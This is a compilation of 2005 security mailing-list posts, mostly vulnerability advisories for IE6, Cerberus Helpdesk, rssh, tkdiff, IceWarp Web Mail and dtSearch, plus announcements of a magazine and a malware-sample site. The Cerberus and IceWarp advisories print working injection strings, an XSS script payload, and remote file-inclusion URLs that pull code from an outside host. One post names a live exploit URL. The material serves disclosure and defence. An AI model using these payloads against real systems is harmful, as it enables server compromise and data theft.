-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 --- | BuHa Security-Advisory #6 |Dec 24th, 2005 | --- | Vendor | M$ Internet Explorer 6.0 | | URL | http://www.microsoft.com/windows/ie/ | | Version | <= 6.0.2900.2180.xpsp_sp2 | | Risk | Low (DoS - Null Pointer Dereference) | --- o Description: = Internet Explorer, abbreviated IE or MSIE, is a proprietary web browser made by Microsoft and currently available as part of Microsoft Windows. Visit http://www.microsoft.com/windows/ie/default.mspx or http://en.wikipedia.org/wiki/Internet_Explorer for detailed information. o Denial of Service: #7d6d8eba === Following HTML code forces M$ IE 6 to crash: > Online-demo: http://morph3us.org/security/pen-testing/msie/ie60-1132900617750-7d6d8eba.html These are the register values and the ASM dump at the time of the access violation: eax= ebx=01295390 ecx= edx= esi=0012d230 edi=01290720 eip=7d6d8eba esp=0012cd08 ebp= cs=001b ss=0023 ds=0023 es=0023 fs=003b gs= efl=0246 7d6d8e84 894c2414 mov [esp+0x14],ecx 7d6d8e88 8b8ea400 mov ecx,[esi+0xa4] 7d6d8e8e 24fe and al,0xfe 7d6d8e90 57 pushedi 7d6d8e91 89542410 mov [esp+0x10],edx 7d6d8e95 8954241c mov [esp+0x1c],edx 7d6d8e99 88442420 mov [esp+0x20],al 7d6d8e9d e89912e5ff callmshtml+0x7a13b (7d52a13b) 7d6d8ea2 8b4c2428 mov ecx,[esp+0x28] 7d6d8ea6 68b2a06e7d push0x7d6ea0b2 7d6d8eab 8bf8 mov edi,eax 7d6d8ead e89bb7e5ff callmshtml+0x8464d (7d53464d) 7d6d8eb2 50 pusheax 7d6d8eb3 8bcf mov ecx,edi 7d6d8eb5 e8dfebfdff callmshtml+0x207a99 (7d6b7a99) FAULT ->7d6d8eba 668b500c mov dx,[eax+0xc] ds:0023:000c= 7d6d8ebe 6685d2 testdx,dx 7d6d8ec1 7c39 jl mshtml+0x228efc (7d6d8efc) 7d6d8ec3 833d50e3747d01 cmp dword ptr [mshtml+0x29e350 (7d74e350)],0x1 7d6d8eca 0fbffa movsx edi,dx 7d6d8ecd 7513 jnz mshtml+0x228ee2 (7d6d8ee2) 7d6d8ecf a14ce3747d mov eax,[mshtml+0x29e34c (7d74e34c)] 7d6d8ed4 8b484c mov ecx,[eax+0x4c] 7d6d8ed7 8b4134 mov eax,[ecx+0x34] 7d6d8eda 8d147f lea edx,[edi+edi*2] 7d6d8edd 8b3c90 mov edi,[eax+edx*4] 7d6d8ee0 eb23 jmp mshtml+0x228f05 (7d6d8f05) The access violation results in a null pointer dereference and is not exploitable. o Vulnerable versions: = The DoS vulnerability was successfully tested on: > M$ IE 6 SP2 - Win XP Pro SP2 > M$ IE 6 - Win 2k SP4 o Disclosure Timeline: = 26 Nov 05 - DoS vulnerability discovered. 15 Dec 05 - Vendor contacted. 17 Dec 05 - Vendor confirmed vulnerability. 24 Dec 05 - Public release. o Solution: == There is no patch yet. The vulnerability will be fixed in an upcoming service pack according to the Microsoft Security Response Center. o Credits: = Christian Deneke <[EMAIL PROTECTED]> - -- Thomas Waldegger <[EMAIL PROTECTED]> BuHa-Security Community - http://buha.info/board/ If you have questions, suggestions or criticism about the advisory feel free to send me a mail. The address '[EMAIL PROTECTED]' is more a spam address than a regular mail address therefore it's possible that I ignore some mails. Please use the contact details at morph3us.org to contact me. Greets fly out to cyrus-tc, destructor, rhy, trappy and all members of BuHa. Advisory online: http://morph3us.org/advisories/20051224-msie6-sp2-3.txt -BEGIN PGP SIGNATURE- Version: n/a Comment: http://morph3us.org/ iD8DBQFDrdu6kCo6/ctnOpYRAs1cAKCOabmBR3EtFBoMz/wKinVVpU/q/ACeK2kG A4pamspAa8+NY9TDiCz738s= =Wga9 -END PGP SIGNATURE-
Obsidis n1 released!
About: Obsidis is a scientific/underground magazine that focuses on research in ITC security. The project is managed by Rosiello Security in conjunction with members of Packetstorm Security, Astalavista, Information Security Writers, Blacksun and Hackers Center who make up the Committee. http://www.obsidis.org Articles released: *) ARC: A Synchronous Stream Cipher from Hash Functions by Angelo P.E. Rosiello & Roberto Carrozzo *) Demystifying SE Linux by Abhishek Singh *) DHCP and the Changing Art of Network Security by James (njan) Eaton-Lee *) Enterprise Security Management by Penetrate *) Internet Protocol: an Introduction by DoZ *) Preventing Http Session Fixation Attacks by Armando Romeo *) Writing Behind a Buffer by Angelo P.E. Rosiello We hope you'll have a nice read! Merry Christmas, Obsidis staff
Cerberus Helpdesk multiple vulnerabilities.
Title: Cerberus Helpdesk multiple vulnerabilities.
Severity: Medium
Affected: cerberus-gui (2.649), support-center (2.649<->3.2.0pr2)
Problem type: remote
Author: Alejandro Ramos
Description:
---
Cerberus Helpdesk is a WebGroup Media helpdesk suite based in php enviroment.
Official webpage: http://www.cerberusweb.com/
Details:
---
support-center:
***
SQL injection in attachment_send.php (line 112):
You can download files from other users or use blind sql injection
attacks:
Example url:
.../support-center/cerberus-support-center/attachment_send.php?file_id=N
[SQL] &thread_id=1
CODE:
$sql = "SELECT part_content FROM thread_attachments_parts WHERE file_id
= $file_id";
XSS:
http://server/support-center/index.php?mod_id=2&kb_ask=%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E
cerberus-gui (parser-related):
***
There are few sql injections if XML is malicious generated:
SQL injections in email_parser.php:
Function: "is_queue_address" (line: 1397) doesn.t check properly the
"$addy" value.
CODE:
$sql = sprintf("SELECT q.queue_name, q.queue_mode,
q.queue_email_display_name, ".
"qa.queue_addresses_id, qa.queue_id, qa.queue_address, ".
"qa.queue_domain, q.queue_prefix, q.queue_response_open, ".
"q.queue_send_open, q.queue_response_gated ".
"FROM queue_addresses qa ".
"LEFT JOIN queue q USING (queue_id) ".
"WHERE LOWER(qa.queue_address) = '%s' ".
"AND LOWER(qa.queue_domain) = '%s'",
strtolower($mailbox),
strtolower($domain)
Function: "is_banned_address" (line: 752) doesn.t check "$address" properly.
CODE:
SELECT a.address_banned FROM address a WHERE a.address_address =
'".$address."'";
Function: "is_admin_address" (line 1532) you can bypass this function
using, as an email address, the following query: "'OR'u.user_superuser'='1'--".
Example of result of this query:
SELECT u.user_id FROM user u WHERE u.user_email != '' AND u.user_email
= '' OR u.user_superuser = '1'
CODE:
SELECT u.user_id FROM user u WHERE u.user_email != '' AND u.user_email
= '$address'";
SQL injection in structs.php:
Function: "cer_email_address_struct" (line: 167) doesn.t check the
following query.
CODE:
$sql = "SELECT a.address_id,a.address_banned FROM address a WHERE
a.address_address = '" . $a_address . "'";
cerberus-gui:
***
SQL injection in cer_KnowledgebaseHandler.class.php:
Function: "_load_article_details" (line 270), you can fetch "superuser" md5
password with blind sql injection.
Example URL:
/cerberus-gui/knowledgebase.php?mode=view_entry&root=2&sid=c7bb6a0d5f83d61d75053c85c14af247&kbid=4
[SQL]
CODE:
$sql = "SELECT k.kb_id, k.kb_entry_date, k.kb_public,
k.kb_category_id, k.kb_keywords, kp.kb_problem_summary, kp.kb_problem_text,
kp.kb_problem_text_is_html, " .
" ks.kb_solution_text, ks.kb_solution_text_is_html,
kc.kb_category_name, u.user_login As entry_user, k.kb_avg_rating,
k.kb_rating_votes " .
" FROM knowledgebase k LEFT JOIN knowledgebase_problem kp ON
(kp.kb_id=k.kb_id) LEFT JOIN knowledgebase_solution ks on (ks.kb_id=k.kb_id) ".
" LEFT JOIN knowledgebase_categories kc ON
(kc.kb_category_id=k.kb_category_id) LEFT JOIN user u ON
(k.kb_entry_user=u.user_id) " .
" WHERE k.kb_id = " . $kbid;
SQL injection in "addresses_export.php":
Example URL:
POST: /cerberus-gui/addresses_export.php
sid=c61ce82aa50569705dd774c3366c&queues%5B%5D=[SQL]&delimiter=comma&file_type=screen&form_submit=x
CODE:
$sql = "SELECT DISTINCT a.address_address FROM ticket t LEFT JOIN
thread th ON (t.min_thread_id=th.thread_id)
LEFT JOIN address a ON (th.thread_address_id=a.address_id) WHERE
t.ticket_queue_id IN ($queues) ORDER BY a.address_address ASC;";
SQL injection in "display.php". "$thread" is not checked
CODE:
$sql = "SELECT th.thread_address_id, a.address_address FROM thread th
LEFT JOIN address a ON (th.thread_address_id = a.address_id) ".
"WHERE th.thread_id = " . $thread;
SQL injection in "display_ticket_thread.php" (line 52).
Example URL:
/cerberus-gui/display_ticket_thread.php?type=comment&sid=a640d024f84be01320aacb0ec6c87d74&ticket=[SQL]
CODE:
$sql = "SELECT t.ticket_id, t.ticket_subject, t.ticket_status,
t.ticket_date, t.ticket_assigned_to_id, t.ticket_queue_id, t.ticket_priority,
th.thread_address_id, ad.address_address, t.queue_addresses_id,
q.queue_name " .
[ GLSA 200512-15 ] rssh: Privilege escalation
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200512-15 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: High Title: rssh: Privilege escalation Date: December 27, 2005 Bugs: #115082 ID: 200512-15 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis Local users could gain root privileges by chrooting into arbitrary directories. Background == rssh is a restricted shell, allowing only a few commands like scp or sftp. It is often used as a complement to OpenSSH to provide limited access to users. Affected packages = --- Package / Vulnerable / Unaffected --- 1 app-shells/rssh < 2.3.0>= 2.3.0 Description === Max Vozeler discovered that the rssh_chroot_helper command allows local users to chroot into arbitrary directories. Impact == A local attacker could exploit this vulnerability to gain root privileges by chrooting into arbitrary directories. Workaround == There is no known workaround at this time. Resolution == All rssh users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=app-shells/rssh-2.3.0" References == [ 1 ] CVE-2005-3345 http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3345 [ 2 ] rssh security announcement http://www.pizzashack.org/rssh/security.shtml Availability This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200512-15.xml Concerns? = Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to [EMAIL PROTECTED] or alternatively, you may file a bug at http://bugs.gentoo.org. License === Copyright 2005 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.0 pgpVGXPSibAEx.pgp Description: PGP signature
[SECURITY] [DSA 927-1] New tkdiff packages fix insecure temporary file creation
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - -- Debian Security Advisory DSA 927-1 [EMAIL PROTECTED] http://www.debian.org/security/ Martin Schulze December 27th, 2005 http://www.debian.org/security/faq - -- Package: tkdiff Vulnerability : insecure temporary file Problem type : local Debian-specific: no CVE ID : CVE-2005-3343 Javier Fernández-Sanguino Peña from the Debian Security Audit project discovered that tkdiff, a graphical side by side "diff" utility, creates temporary files in an insecure fashion. For the old stable distribution (woody) this problem has been fixed in version 3.08-3woody0. For the stable distribution (sarge) this problem has been fixed in version 4.0.2-1sarge0. For the unstable distribution (sid) this problem has been fixed in version 4.0.2-2. We recommend that you upgrade your tkdiff package. Upgrade Instructions - wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 3.0 alias woody - Source archives: http://security.debian.org/pool/updates/main/t/tkdiff/tkdiff_3.08-3woody0.dsc Size/MD5 checksum: 568 f331eee995b5ec3b5346b519c7147ee4 http://security.debian.org/pool/updates/main/t/tkdiff/tkdiff_3.08-3woody0.diff.gz Size/MD5 checksum: 3685 f00859ddd284e8016728b5a1d00b6fdd http://security.debian.org/pool/updates/main/t/tkdiff/tkdiff_3.08.orig.tar.gz Size/MD5 checksum:63171 197e9bee9812a5698889c589efd9b1ee Architecture independent components: http://security.debian.org/pool/updates/main/t/tkdiff/tkdiff_3.08-3woody0_all.deb Size/MD5 checksum:67308 7314490886f96610a31f71bc22513c7f Debian GNU/Linux 3.1 alias sarge - Source archives: http://security.debian.org/pool/updates/main/t/tkdiff/tkdiff_4.0.2-1sarge0.dsc Size/MD5 checksum: 571 e54f2d9fcd23c386640502fbe119e2b0 http://security.debian.org/pool/updates/main/t/tkdiff/tkdiff_4.0.2-1sarge0.diff.gz Size/MD5 checksum: 3973 decabcedfbb5b9fc7dfa8a48b661b563 http://security.debian.org/pool/updates/main/t/tkdiff/tkdiff_4.0.2.orig.tar.gz Size/MD5 checksum:86258 c52f7d8d87ebe34fbba6b6bdf30f3c60 Architecture independent components: http://security.debian.org/pool/updates/main/t/tkdiff/tkdiff_4.0.2-1sarge0_all.deb Size/MD5 checksum:85468 c5fe0c83bfb827e2903a045767f03ded These files will probably be moved into the stable distribution on its next update. - - For apt-get: deb http://security.debian.org/ stable/updates main For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main Mailing list: debian-security-announce@lists.debian.org Package info: `apt-cache show ' and http://packages.debian.org/ -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.2 (GNU/Linux) iD8DBQFDsRIqW5ql+IAeqTIRAkdvAKCK00pkEMfITxstn1NNAw/FfY1L6gCePA5p ubVrX5NT23KTtox5UHV65S0= =HIHB -END PGP SIGNATURE-
Secunia Research: IceWarp Web Mail Multiple File Inclusion Vulnerabilities
== Secunia Research 27/12/2005 - IceWarp Web Mail Multiple File Inclusion Vulnerabilities - == Table of Contents Affected Software1 Severity.2 Description of Vulnerability.3 Solution.4 Time Table...5 Credits..6 References...7 About Secunia8 Verification.9 == 1) Affected Software * Merak Mail Server version 8.3.0.r. * VisNetic Mail Server version 8.3.0 build 1. Other versions may also be affected. == 2) Severity Rating: Highly Critical Impact: System access Exposure of sensitive information Where: Remote == 3) Description of Vulnerability Secunia Research has discovered some vulnerabilities in IceWarp Web Mail, which can be exploited by malicious users and by malicious people to disclose potentially sensitive information and to compromise a vulnerable system. 1) The webmail and webadmin services run with PHP configured with "register_global" enabled. The "language" and "lang_settings" variables in "/accounts/inc/include.php" and "/admin/inc/include.php" are not properly initialised when the scripts are accessed directly. This makes it possible to overwrite the variables to cause the scripts to include arbitrary PHP scripts from local and remote sources. Example: http://[host]:32000/accounts/inc/include.php? language=0&lang_settings[0][1]=http://[host]/ http://[host]:32000/admin/inc/include.php? language=0&lang_settings[0][1]=http://[host]/ Successful exploitation allows execution of arbitrary PHP code on a vulnerable server with SYSTEM privileges without requiring authentication. 2) Input passed to the "lang" parameter in "/dir/include.html" isn't properly validated before being used to include files. This can be exploited to include arbitrary files from local sources. Example: http://[host]:32000/dir/include.html?lang=[file]%00 Successful exploitation allows disclosure of arbitrary files on a vulnerable server without requiring authentication. 3) Input passed to the "language" parameter in "/mail/settings.html" isn't properly validated before being saved to the database. This can be exploited in conjunction with overwrite of the "lang_settings" variable, to include arbitrary PHP scripts from local and remote sources. Example: http://[host]:32000/mail/settings.html? id=[current_id]&Save_x=1&language=TEST http://[host]:32000/mail/index.html? id=[current_id]&lang_settings[TEST]=test;http://[host]/; Successful exploitation allows execution of arbitrary PHP scripts on a vulnerable server with SYSTEM privileges but requires a valid logon. 4) The "default_layout" and "layout_settings" variables are not properly initialised when "/mail/include.html" encounters a HTTP_USER_AGENT string that it does not recognise. This can be exploited in conjunction with overwrite of the "default_layout" and "layout_settings" variables to disclose the content of local files. Example (using non-IE/Mozilla/Firefox browser): http://[host]:32000/mail/index.html?/mail/index.html? default_layout=OUTLOOK2003&layout_settings[OUTLOOK2003]=test;[file]%00;2 Successful exploitation allows disclosure of arbitrary files on a vulnerable server without requiring authentication. == 4) Solution Merak Mail Server: Update to version 8.3.5.r. VisNetic Mail Server: Update to version 8.3.5. == 5) Time Table 07/12/2005 - Initial vendor notification. 07/12/2005 - Initial vendor reply. 27/12/2005 - Public disclosure. == 6) Credits Discovered by Tan Chew Keong, Secunia Research. == 7) References No other references available. == 8) About Secunia Secunia collects, validates, assesses, and writes advisories regarding all the latest software vulnerabilities disclosed to the public. These advisories are gathered in a publicly available database at the Secunia website: http://secunia.com/ Secunia offers services to o
dtSearch DUNZIP32.dll Buffer Overflow Vulnerability
Networksecurity.fi Security Advisory (21-12-2005) Title: dtSearch DUNZIP32.dll Buffer Overflow Vulnerability Criticality: High (3/3) Affected software: dtSearch versions prior than 7.20 Build 7136 Author: Juha-Matti Laurio Date: 21th December, 2005 Advisory ID: Networksecurity.fi Security Advisory (21-12-2005) (#15) CVE reference: CVE-2004-1094 - From the vendor: "Instantly Search Terabytes of Text The dtSearch product line can instantly search terabytes of text across a desktop, network, Internet or Intranet site." - Description: dtSearch document search system is confirmed as affected to remote type buffer overflow vulnerability. The vulnerability is caused due to a boundary error in a 3rd-party compression library's (DUNZIP32.dll) remarkable old, vulnerable version used when handling packed .ZIP documents. InnerMedia DynaZip compression library mentioned is responsible for indexing and displaying operations. This can be exploited to cause a buffer overflow via a specially crafted zipped document. When a specially crafted .zip document containing a file with an overly long filename (a file name or files inside a ZIP) is opened, the application will crash and the attacker may be able to execute arbitrary code on user's system (see US-CERT VU#582498 reference). - Detailed description: Affected DynaZip library examined is version from December, 2002, file version 5.0.0.2. According to InnerMedia company versions 5.00.03 and prior are affected. The following remarkable old file was copied to C:\Program Files\dtSearch\bin directory during an installation process when tested: File name: dunzip32.dll Date stamp: 6th December, 2002 04:05PM File version: 5.0.0.2 Description: DynaZIP-32 Multi-Threading UnZIP DLL NOTE: Dunzip32.dll is being installed into the same directory as the application executable of dtSearch Engine if dtSearch has been installed on end-users' machines. If the situation is as described, updating of the libary on end-users' machines by applying a software update is also needed. From US-CERT VU#582498: "Impact: If a remote attacker can persuade a user to access a specially crafted zip file, the attacker may be able to execute arbitrary code on that user's system possibly with elevated privileges." - Affected versions: The vulnerability has been confirmed in dtSearch Desktop with Spider version 7.10 (Build 7045). Other versions may also be affected. The newest dtSearch version from 6.x product line is dtSearch 6.5 Build 6608. All earlier versions (vendor's Web pages list versions 1.x to 5.25) are probably affected as well. - OS: Microsoft Windows (Win 95/98/ME/NT/2000/XP/2003/.NET) Tests was done with Microsoft Windows XP Professional SP2 and Microsoft Windows 2000 Professional SP4 fully patched. - Solution status: Vendor has issued a patch shipped with immune library version 5.00.07. It can be obtained by downloading a patch from: http://www.dtsearch.com/download.html#upgrades - Software: dtSearch 7.x dtSearch 6.x http://www.dtsearch.com/PLF_desktop.html (Desktop with Spider) Vendor and vendor Home Page: dtSearch Corp. http://www.dtsearch.com Vendor product Web page: http://www.dtsearch.com/PLF_desktop.html (Desktop with Spider) - Solution: Apply a patch 7.20 Build 7136 (version number 7.20.7136.1): http://www.dtsearch.com/download.html#upgrades - CVE information: The Common Vulnerabilities and Exposures (CVE) project has assigned the name CVE-2004-1094 on 20th December, 2005 to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org ), which standardizes names for security problems. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1094 The CVSS (Common Vulnerability Scoring System) severity level metric of issue CVE-2004-1094: 10 (High) - References: US-CERT VU#582498: "InnerMedia DynaZip library vulnerable to buffer overflow via long file names" http://www.kb.cert.org/vuls/id/582498 From the vulnerability note: "Users are encouraged to contact their software vendors if they suspect they are vulnerable." Upgrade information for version 6.x or earlier: http://support.dtsearch.com/faq/dts0201.htm Credit information: This vulnerability was researched by Juha-Matti Laurio, Networksecurity.fi (Finland). Timeline: 12-Oct-2005 - Vulnerability researched and confirmed 05-Nov-2005 - Vendor was contacted 05-Nov-2005 - Vendor's reply, vendor informed about upcoming, fixed version and timeline 06-Nov-2005 - Vendor issues a patch, detailed research 20-Dec-2005 - CVE information submission sent to Mitre.org 20-Dec-2005 - Mitre.org assigns CVE-2004-1094 21-Dec-2005 - Security companies and several CERT units contacted 23-Dec-2005 - Public disclosure A full version of security advisory is located at http://www.networksecurity.fi/advisories/dtsearch.html Networksecurity.fi Weblog (Finnish language): http://networksecurity.typepad.com/
Is this a new exploit?
Warning the following URL successfully exploited a fully patched windows xp system with a freshly updated norton anti virus. unionseek.com/d/t1/wmf_exp.htm The url runs a .wmf and executes the virus, f-secure will pick up the virus norton will not.
Malware sample site
Just wanted to let you guys know about a new computer security site at http://www.offensivecomputing.net The purpose of this site is to foster collaborative analysis, cataloging and identification of malware in order to improve defense and awareness. This was something myself and other colleagues have seen the need for a long time but could never find anything similar because most malware collections are either closed lists or corporate non-public collections. This site is free and open to all. The basic idea is to have a community site where you can search for malware based on name or md5sum and get zipped copies. People can upload their own samples of malware and collaborate on analysis in a sort of a blog style. (think community commented disassembles, graphs, ida databases, etc.) I know there are some problems with the concept such as using md5sums but its a start and has proven useful already. I've got some malware collection stuff to help add to the database and I have a small collection built up over the years that I am slowly adding as well. I've started it off with some copies of common stuff like welchia, sobig, the sony drm rootkit, etc. and some minimal analysis. This is NOT another Vx'ers site and the purpose isn't to propagate worms or viruses but rather provide a medium for people to conduct collaborative defense research with full access to the tools and samples. We're interested in any feedback, collaborations, and ideas from the community and have already gotten a ton of response since launching last Friday. have a good one, V.
